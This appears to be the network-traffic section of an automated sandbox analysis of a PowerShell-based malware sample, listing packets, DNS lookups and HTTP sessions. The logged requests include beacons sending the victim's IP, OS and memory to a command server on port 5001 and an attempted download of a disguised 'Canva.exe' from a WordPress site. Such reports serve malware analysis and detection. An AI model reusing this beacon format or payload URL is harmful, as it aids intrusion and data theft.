                                                Feb 18, 2025 08:26:02.816248894 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.816265106 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.816268921 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.816301107 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.816692114 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.816725016 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.816740036 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.816747904 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.816777945 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.816792965 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.817297935 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.817341089 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.817367077 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.817377090 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.817411900 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.817461967 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.817490101 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.817537069 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.818249941 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.818294048 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.818444014 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.818480015 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.818494081 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.818502903 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.818520069 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.818538904 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.819190025 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.819240093 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.819369078 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.819425106 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.859548092 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.859628916 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.902978897 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.903057098 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.903115988 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.903162956 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.903187990 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.903223991 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.903259039 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.903275013 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.903322935 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.903362989 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.904709101 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.904727936 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:03.051590919 CET50014970591.206.178.120192.168.2.7
                                                Feb 18, 2025 08:26:03.060940981 CET50014970591.206.178.120192.168.2.7
                                                Feb 18, 2025 08:26:03.060956955 CET50014970591.206.178.120192.168.2.7
                                                Feb 18, 2025 08:26:03.061005116 CET497055001192.168.2.791.206.178.120
                                                Feb 18, 2025 08:26:03.061031103 CET497055001192.168.2.791.206.178.120
                                                Feb 18, 2025 08:26:03.066149950 CET497055001192.168.2.791.206.178.120
                                                Feb 18, 2025 08:26:03.071980000 CET50014970591.206.178.120192.168.2.7
                                                Feb 18, 2025 08:26:03.358095884 CET4969980192.168.2.7104.26.12.205
                                                Feb 18, 2025 08:26:28.969561100 CET5764253192.168.2.7162.159.36.2
                                                Feb 18, 2025 08:26:28.974333048 CET5357642162.159.36.2192.168.2.7
                                                Feb 18, 2025 08:26:28.974451065 CET5764253192.168.2.7162.159.36.2
                                                Feb 18, 2025 08:26:28.979275942 CET5357642162.159.36.2192.168.2.7
                                                Feb 18, 2025 08:26:29.428610086 CET5764253192.168.2.7162.159.36.2
                                                Feb 18, 2025 08:26:29.433676004 CET5357642162.159.36.2192.168.2.7
                                                Feb 18, 2025 08:26:29.433747053 CET5764253192.168.2.7162.159.36.2

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Feb 18, 2025 08:25:57.828140020 CET6451153192.168.2.71.1.1.1
                                                Feb 18, 2025 08:25:57.835222006 CET53645111.1.1.1192.168.2.7
                                                Feb 18, 2025 08:26:00.808561087 CET6431053192.168.2.71.1.1.1
                                                Feb 18, 2025 08:26:00.843296051 CET53643101.1.1.1192.168.2.7
                                                Feb 18, 2025 08:26:02.020291090 CET5792653192.168.2.71.1.1.1
                                                Feb 18, 2025 08:26:02.027892113 CET53579261.1.1.1192.168.2.7
                                                Feb 18, 2025 08:26:28.968992949 CET5357484162.159.36.2192.168.2.7
                                                Feb 18, 2025 08:26:29.437591076 CET6392753192.168.2.71.1.1.1
                                                Feb 18, 2025 08:26:29.445164919 CET53639271.1.1.1192.168.2.7

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Feb 18, 2025 08:25:57.828140020 CET192.168.2.71.1.1.10x3aa0Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                Feb 18, 2025 08:26:00.808561087 CET192.168.2.71.1.1.10xb3dfStandard query (0)goutteuy.comA (IP address)IN (0x0001)false
                                                Feb 18, 2025 08:26:02.020291090 CET192.168.2.71.1.1.10xa803Standard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                Feb 18, 2025 08:26:29.437591076 CET192.168.2.71.1.1.10x7692Standard query (0)241.42.69.40.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Feb 18, 2025 08:25:57.835222006 CET1.1.1.1192.168.2.70x3aa0No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                Feb 18, 2025 08:25:57.835222006 CET1.1.1.1192.168.2.70x3aa0No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                Feb 18, 2025 08:25:57.835222006 CET1.1.1.1192.168.2.70x3aa0No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                Feb 18, 2025 08:26:00.843296051 CET1.1.1.1192.168.2.70xb3dfNo error (0)goutteuy.com185.211.7.193A (IP address)IN (0x0001)false
                                                Feb 18, 2025 08:26:02.027892113 CET1.1.1.1192.168.2.70xa803No error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                Feb 18, 2025 08:26:02.027892113 CET1.1.1.1192.168.2.70xa803No error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                Feb 18, 2025 08:26:29.445164919 CET1.1.1.1192.168.2.70x7692Name error (3)241.42.69.40.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • goutteuy.com
                                                • maxcdn.bootstrapcdn.com
                                                • api.ipify.org
                                                • 91.206.178.120:5001

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.749699104.26.12.205807236C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                TimestampBytes transferredDirectionData
                                                Feb 18, 2025 08:25:57.849359989 CET158OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                Host: api.ipify.org
                                                Connection: Keep-Alive
                                                Feb 18, 2025 08:25:58.322365046 CET431INHTTP/1.1 200 OK
                                                Date: Tue, 18 Feb 2025 07:25:58 GMT
                                                Content-Type: text/plain
                                                Content-Length: 12
                                                Connection: keep-alive
                                                Vary: Origin
                                                cf-cache-status: DYNAMIC
                                                Server: cloudflare
                                                CF-RAY: 913c49472b507280-EWR
                                                server-timing: cfL4;desc="?proto=TCP&rtt=2349&min_rtt=2349&rtt_var=1174&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=158&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                Data Ascii: 8.46.123.189


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.74970091.206.178.12050017236C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                TimestampBytes transferredDirectionData
                                                Feb 18, 2025 08:25:59.622049093 CET264OUTGET /script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=66350 HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                Host: 91.206.178.120:5001
                                                Connection: Keep-Alive
                                                Feb 18, 2025 08:26:00.772011995 CET174INHTTP/1.1 200 OK
                                                Server: Werkzeug/3.1.3 Python/3.10.12
                                                Date: Tue, 18 Feb 2025 07:26:00 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Content-Length: 21
                                                Connection: close


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.74970591.206.178.12050017236C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                TimestampBytes transferredDirectionData
                                                Feb 18, 2025 08:26:02.367400885 CET170OUTGET /script_end?random_number=66350 HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                Host: 91.206.178.120:5001
                                                Feb 18, 2025 08:26:03.051590919 CET174INHTTP/1.1 200 OK
                                                Server: Werkzeug/3.1.3 Python/3.10.12
                                                Date: Tue, 18 Feb 2025 07:26:02 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Content-Length: 19
                                                Connection: close


                                                HTTPS Proxied Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.749701185.211.7.1934437236C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                TimestampBytes transferredDirectionData
                                                2025-02-18 07:26:01 UTC206OUTGET /wp-content/plugins/header-footer/images/Canva.exe HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                Host: goutteuy.com
                                                Connection: Keep-Alive
                                                2025-02-18 07:26:01 UTC524INHTTP/1.1 404 Not Found
                                                Connection: close
                                                content-type: text/html
                                                last-modified: Fri, 07 Jan 2022 09:51:35 GMT
                                                etag: "999-61d80d27-4ab5739bf7ac3281;;;"
                                                accept-ranges: bytes
                                                content-length: 2457
                                                date: Tue, 18 Feb 2025 07:26:01 GMT
                                                server: LiteSpeed
                                                content-security-policy: upgrade-insecure-requests
                                                platform: hostinger
                                                panel: hpanel
                                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                2025-02-18 07:26:01 UTC844INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69
                                                Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# si
                                                2025-02-18 07:26:01 UTC1613INData Raw: 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 6f 70 73 2c 20 73 6f 6d 65 74 68 69 6e 67 20 6c 6f 73 74 3c 2f 74 69 74 6c 65 3e 0a
                                                Data Ascii: } .ng-anchor { position: absolute; } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.749702104.18.11.2074437236C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                TimestampBytes transferredDirectionData
                                                2025-02-18 07:26:02 UTC344OUTGET /bootstrap/3.3.7/css/bootstrap.min.css HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-CH
                                                Accept-Encoding: gzip, deflate
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                Host: maxcdn.bootstrapcdn.com
                                                Connection: Keep-Alive
                                                2025-02-18 07:26:02 UTC952INHTTP/1.1 200 OK
                                                Date: Tue, 18 Feb 2025 07:26:02 GMT
                                                Content-Type: text/css; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                CDN-PullZone: 252412
                                                CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                CDN-RequestCountryCode: US
                                                Vary: Accept-Encoding
                                                Access-Control-Allow-Origin: *
                                                Cache-Control: public, max-age=31919000
                                                ETag: W/"ec3bb52a00e176a7181d454dffaea219"
                                                Last-Modified: Mon, 25 Jan 2021 22:03:59 GMT
                                                CDN-ProxyVer: 1.06
                                                CDN-RequestPullSuccess: True
                                                CDN-RequestPullCode: 200
                                                CDN-CachedAt: 12/24/2024 11:48:40
                                                CDN-EdgeStorageId: 718
                                                timing-allow-origin: *
                                                cross-origin-resource-policy: cross-origin
                                                X-Content-Type-Options: nosniff
                                                CDN-Status: 200
                                                CDN-RequestTime: 0
                                                CDN-RequestId: e6a91a8b3f8912bc7b5ad8b75eed4780
                                                CDN-Cache: HIT
                                                CF-Cache-Status: HIT
                                                Age: 2070044
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Server: cloudflare
                                                CF-RAY: 913c49621aef43da-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2025-02-18 07:26:02 UTC417INData Raw: 37 62 66 61 0d 0a 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 33 2e 33 2e 37 20 28 68 74 74 70 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 36 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 2f 2a 21 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 76 33 2e 30 2e 33 20 7c 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 7c 20 67 69 74 68 75 62 2e 63 6f 6d 2f 6e 65 63 6f 6c 61 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 2a 2f 68 74 6d 6c 7b
                                                Data Ascii: 7bfa/*! * Bootstrap v3.3.7 (http://getbootstrap.com) * Copyright 2011-2016 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) *//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{
                                                2025-02-18 07:26:02 UTC1369INData Raw: 75 2c 6e 61 76 2c 73 65 63 74 69 6f 6e 2c 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 61 75 64 69 6f 2c 63 61 6e 76 61 73 2c 70 72 6f 67 72 65 73 73 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 5b 68 69 64 64 65 6e 5d 2c 74 65 6d 70 6c 61 74 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 61 3a 61 63 74 69 76 65 2c 61 3a 68 6f 76 65 72 7b 6f 75 74 6c 69 6e 65 3a 30 7d 61 62 62 72 5b 74 69 74 6c 65 5d 7b 62
                                                Data Ascii: u,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{b
                                                2025-02-18 07:26:02 UTC1369INData Raw: 7b 68 65 69 67 68 74 3a 61 75 74 6f 7d 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 74 65 78 74 66 69 65 6c 64 7d 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 63 61 6e 63 65 6c 2d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63
                                                Data Ascii: {height:auto}input[type=search]{-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-appearance:textfield}input[type=search]::-webkit-search-cancel-button,input[type=search]::-webkit-search-decoration{-webkit-appearanc
                                                2025-02-18 07:26:02 UTC1369INData Raw: 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 64 64 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 47 6c 79 70 68 69 63 6f 6e 73 20 48 61 6c 66 6c 69 6e 67 73 27 3b 73 72 63 3a 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 67 6c 79 70 68 69 63 6f 6e 73 2d 68 61 6c 66 6c 69 6e 67 73 2d 72 65 67 75 6c 61 72 2e 65 6f 74 29 3b 73 72 63 3a 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 67 6c 79 70 68 69 63 6f 6e 73 2d 68 61 6c 66 6c 69 6e 67 73 2d 72 65 67 75 6c 61 72 2e 65 6f 74 3f 23 69 65 66 69 78 29 20 66 6f 72 6d 61 74 28 27 65 6d 62 65 64 64 65 64 2d 6f 70 65 6e 74 79 70 65 27 29 2c 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 67 6c 79 70 68 69 63 6f 6e 73 2d 68 61 6c 66 6c 69 6e 67 73 2d 72 65 67 75 6c 61 72 2e 77 6f 66
                                                Data Ascii: :1px solid #ddd!important}}@font-face{font-family:'Glyphicons Halflings';src:url(../fonts/glyphicons-halflings-regular.eot);src:url(../fonts/glyphicons-halflings-regular.eot?#iefix) format('embedded-opentype'),url(../fonts/glyphicons-halflings-regular.wof
                                                2025-02-18 07:26:02 UTC1369INData Raw: 5c 65 30 31 30 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 74 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 31 31 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 74 68 2d 6c 69 73 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 31 32 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 6f 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 31 33 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 72 65 6d 6f 76 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 31 34 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 7a 6f 6f 6d 2d 69 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 31 35 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 7a 6f 6f 6d 2d 6f 75 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 31 36 22 7d 2e 67 6c 79 70 68
                                                Data Ascii: \e010"}.glyphicon-th:before{content:"\e011"}.glyphicon-th-list:before{content:"\e012"}.glyphicon-ok:before{content:"\e013"}.glyphicon-remove:before{content:"\e014"}.glyphicon-zoom-in:before{content:"\e015"}.glyphicon-zoom-out:before{content:"\e016"}.glyph
                                                2025-02-18 07:26:02 UTC1369INData Raw: 63 6f 6e 2d 62 6f 6f 6b 6d 61 72 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 34 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 70 72 69 6e 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 35 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 61 6d 65 72 61 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 36 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 66 6f 6e 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 37 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 62 6f 6c 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 38 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 69 74 61 6c 69 63 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 39 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 74 65 78 74 2d 68 65 69
                                                Data Ascii: con-bookmark:before{content:"\e044"}.glyphicon-print:before{content:"\e045"}.glyphicon-camera:before{content:"\e046"}.glyphicon-font:before{content:"\e047"}.glyphicon-bold:before{content:"\e048"}.glyphicon-italic:before{content:"\e049"}.glyphicon-text-hei
                                                2025-02-18 07:26:02 UTC1369INData Raw: 70 68 69 63 6f 6e 2d 73 74 65 70 2d 66 6f 72 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 37 37 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 65 6a 65 63 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 37 38 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 68 65 76 72 6f 6e 2d 6c 65 66 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 37 39 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 68 65 76 72 6f 6e 2d 72 69 67 68 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 38 30 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 70 6c 75 73 2d 73 69 67 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 38 31 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 6d 69 6e 75 73 2d 73 69 67 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74
                                                Data Ascii: phicon-step-forward:before{content:"\e077"}.glyphicon-eject:before{content:"\e078"}.glyphicon-chevron-left:before{content:"\e079"}.glyphicon-chevron-right:before{content:"\e080"}.glyphicon-plus-sign:before{content:"\e081"}.glyphicon-minus-sign:before{cont
                                                2025-02-18 07:26:02 UTC1369INData Raw: 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 6f 6d 6d 65 6e 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 31 31 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 6d 61 67 6e 65 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 31 32 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 68 65 76 72 6f 6e 2d 75 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 31 33 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 68 65 76 72 6f 6e 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 31 34 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 72 65 74 77 65 65 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 31 35 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 73 68 6f 70 70 69 6e 67 2d 63 61 72 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74
                                                Data Ascii: "}.glyphicon-comment:before{content:"\e111"}.glyphicon-magnet:before{content:"\e112"}.glyphicon-chevron-up:before{content:"\e113"}.glyphicon-chevron-down:before{content:"\e114"}.glyphicon-retweet:before{content:"\e115"}.glyphicon-shopping-cart:before{cont
